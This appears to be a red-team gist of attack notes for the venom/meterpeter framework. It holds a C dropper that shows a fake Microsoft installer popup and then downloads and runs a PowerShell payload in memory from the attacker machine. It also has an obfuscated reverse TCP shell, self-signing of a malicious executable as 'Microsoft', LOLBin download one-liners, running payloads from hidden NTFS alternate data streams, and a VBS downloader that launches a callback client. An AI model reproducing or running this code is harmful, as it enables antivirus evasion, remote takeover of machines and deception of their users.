-
-
Save r00t-3xp10it/e55c196e7ac9e5fc1eb8ea6a2feb0d65 to your computer and use it in GitHub Desktop.
meterpeter new updates |
Dropper.c
- Compile this template to EXE (mingw32)
- LolBin:
new-object -com WinHttp.WinHttpRequest.5.1
- LolBin:
/*
Author: r00t-3xp10it (SSA RedTeam @2020)
Framework: Venom v1.0.17 - Amsi Evasion - Agent nº 7
Function: This template its used to download the Client.ps1 from attacker
machine (LAN) and execute it on target RAM (fileless - payload does not touch disk)
*/
#include<stdio.h>
#include<stdlib.h>
#include<winsock2.h>
#include<windows.h>
int main()
{
/* PS MsgBox for target user reading (Social Engineering) */
system("powershell (New-Object -ComObject Wscript.Shell).Popup(\"\"\"Install Microsoft Application ?\"\"\",4,\"\"\"$Drop - 3.10.5-dev Windows Installer\"\"\",1+64)")
/* Remotelly download Client.ps1 and execute it on Target RAM */
system("powershell $MyCat=("{2}{0}{1}" -f'o','xy','$pr');$Token=("{1}{0}{2}" -f'pa','by','ss');powershell -exec $Token -w 1 -C $MyCat=New-Object -Com WinHttp.WinHttpRequest.5.1;$MyCat.open('GET','http://$lhost/$Drop.ps1',`$false);$MyCat.send();& ('i'+'ex') $MyCat.responseText;");
return 0;
}
Sign standalone executable (SSL)
- Ask user to enter SSL password to be used
openssl req -x509 -newkey rsa:4096 -keyout output/key.pem -out output/cert.pem -days 365
osslsigncode sign -certs "output/cert.pem" -pass "toor" -key "output/key.pem" -n "Microsoft" -i "https://www.Microsoft.com" -t "http://timestamp.comodoca.com/authenticode" -in "output/evil_x86.exe" -out "output/signed_x86.exe"
OR:
- i can use the reverse technic to deliver the URL insted of one dropper
Reverse tcp ps shell
- With localhost ip adress obfuscation (hex)
## Build Reverse TCP Powershell Shell (hex obfuscated).
echo "${BlueF}[☠]${white} Writting Reverse Powershell Shell to output ..";sleep 2
<#
Obfuscated (hex) Reverse Powershell Shell
Framework: venom v1.0.17 (amsi evasion)
#>
while ($true) {
$gui = "PCli";
$func = "ent";
$bin = "ets.TC";
$auto = ".Net.Sock";
$Cache = "System";
$px = $hexed;
$p = ($px | ForEach { [convert]::ToInt32($_,16) }) -join '.';
$w = "GET /index.html HTTP/1.1\`r\`nHost: $p\`r\`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\`r\`nAccept: text/html\`r\`n\`r\`n\";
$s = [System.Text.ASCIIEncoding];[byte[]]\$b = 0..65535|%{0};$x = "n-eiorvsxpk5";
Set-alias $x ($x[$true-10] + ($x[[byte]("0x" + "FF") - 265]) + $x[[byte]("0x" + "9a") - 158]);
$y = New-Object $Cache$auto$bin$gui$func($p,$lport);
$z = $y.GetStream();
$d = $s::UTF8.GetBytes($w);
$z.Write($d, 0, $d.Length);
$t = (n-eiorvsxpk5 whoami) + "> ";
while(($l = $z.Read($b, 0, $b.Length)) -ne 0) {
$v = (New-Object -TypeName $s).GetString($b,0, $l);
$d = $s::UTF8.GetBytes((n-eiorvsxpk5 $v 2>&1 | Out-String )) + $s::UTF8.GetBytes($t);
$z.Write($d, 0, $d.Length);
}
$y.Close();
Start-Sleep -Seconds 3
}
For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:
$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"
... New-Object $a$b$c$d ...
Another example
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "b`y"
$kjEbjGhcfGYxfdIOzgvYTE.kjGTFhAfdUsjxIPbk = "pa`s`s"
amsi script.block signatures: https://github.com/PowerShell/PowerShell/blob/v6.0.0-alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1612-L1660
not detected (windows defender)
server: https://raw.githubusercontent.com/federicochieregato/DarkFox/master/server.py
Client: https://github.com/federicochieregato/DarkFox/blob/master/client.py
darkarmor: https://blog.dylan.codes/bypassing-av-via/
use winHTTPRequest with this ? => https://github.com/r00t-3xp10it/venom/tree/master/templates/hta_attack
onelinner download
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png C:\Users\pedro\Desktop\ignite.png
start xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/2305mJkp && timeout 6 && taskkill /F /IM xwizard.exe >NUL
Download with VBS api
- dropper.vbs (replace Objshell.Run API flagged by AV)
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell -exec bypass -w 1 -C (NeW-Object Net.WebClient).DownloadFile('https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe', '%tmp%\\Client.exe')"
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell Start-Process -windowstyle hidden -FilePath '%tmp%\\Client.exe' -ArgumentList 'ip=192.168.1.73','port=666'"
Alternate data streams (ADS)
What are Alternate Data Streams?
Alternate Data Streams (ADS) have been around since the introduction of windows NTFS. They were designed to provide
compatibility with the old Hierarchical File System (HFS) from Mac which uses something called resource forks.
Basically, ADS can be used to hide the presence of a secret or malicious file inside the file record of an innocent file. That is,
when windows shows you a file, say "readme.txt", the metadata that tells your system where to get "readme.txt" may also
contain information for "EvilSpyware.exe". Thus, malicious files may be on your system and you cannot see them using normal means.
How to see Alternate Data Streams records in CLI?
dir /r
Proof-Of-Concept
- Create one
text
file to be embebbed with onejpg image
echo test if it works > SSAredTeam.txt
type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg
- Delete kali-linux.jpg image
del kali-linux.jpg
- see ads
dir /r
- Execute kali-linux.jpg image
mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg
hidde mp3 in text file
- Create one
text
file to be embebbed with onemp3 file
echo test if it works > SSAredTeam.txt
- Append the
mp3 file
to thetext
file
type mysong.mp3 > SSAredTeam.txt:mysong.mp3
- Delete mysong mp3
del mysong.mp3
- see ads
dir /r
- Execute mysong.mp3 (ads)
wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3
hidde exe in text file
- Create one
text
file to be embebbed with oneexe file
echo test if it works > SSAredTeam.txt
- Append the
exe file
to thetext
file
type payload.exe > SSAredTeam.txt:payload.exe
- Delete payload exe
del payload.exe
- see ads
dir /r
- Execute payload.exe (ads)
wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"
- Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < SSAredTeam.txt:payload.bat
- Execute payload.ps1 stored in an Alternate Data Stream (ADS).
powershell .\SSAredTeam.txt:payload.ps1
Download files using VBS
' Set your url settings and the saving options
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
if objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
x=MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe",64,"VBS Downloader")
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"
venom v1.0.17 - shinigami
Dropper.c
file before being compiled into an Linux standalone executable